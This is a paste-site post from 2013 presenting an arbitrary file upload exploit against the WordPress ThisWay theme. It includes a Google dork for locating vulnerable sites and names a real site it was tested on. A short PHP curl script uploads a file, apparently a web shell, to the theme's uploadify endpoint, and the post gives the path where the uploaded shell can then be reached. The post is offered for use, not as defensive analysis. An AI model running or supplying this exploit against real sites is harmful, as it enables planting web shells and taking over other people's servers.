WordPress File Upload Vulnerability 23-11-2013

SUBMITTED BY: Guest

DATE: Nov. 23, 2013, 6:07 a.m.

FORMAT: Text only

SIZE: 1.1 kB

Raw Download

HITS: 1114

Report
  1. ########################################################################################
  2. #Exploit title: WordPress ThisWay theme - Arbitrary File Upload Vulnerability
  3. #Author: Drac-101code
  4. #Google Dork: inurl:"/wp-content/themes/ThisWay/"
  5. #Date:22 November 2013
  6. #Vendor Homepage: http://themeforest.net/
  7. #Themes Link: http://www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
  8. #Tested on site : http://filmvideo.massart.edu/
  9. ########################################################################################
  11. [+]EXPLOIT
  13. <?php
  14. $uploadfile="upl.php";
  15. $ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
  16. curl_setopt($ch, CURLOPT_POST, true);
  17. curl_setopt($ch, CURLOPT_POSTFIELDS,
  18. array('Filedata'=>"@$uploadfile"));
  19. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  20. $postResult = curl_exec($ch);
  21. curl_close($ch);
  22. print "$postResult";
  23. ?>
  25. [+]SHELL ACCSES
  26. http://[localcrot]/wp-content/uploads/[year]/[month]/[search your shell].php
comments powered by Disqus